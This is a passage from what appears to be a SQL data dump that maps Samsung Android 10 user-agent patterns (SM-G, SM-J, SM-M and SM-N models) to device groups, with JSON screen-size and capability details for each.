Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G965U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G965W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G9700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G970W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G9730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G973U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G973U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G973W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G977B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G977N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G977U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G981U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G981U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G981V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G981W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G986U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G9880) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G988B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G988U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-G988W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J400F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J400M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J600GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J610FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J610G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J720M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J810G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J810M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-J810Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M013F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M015F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M115M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M205M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M215F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M305M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M307F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M317F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-M515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N960N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N9700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 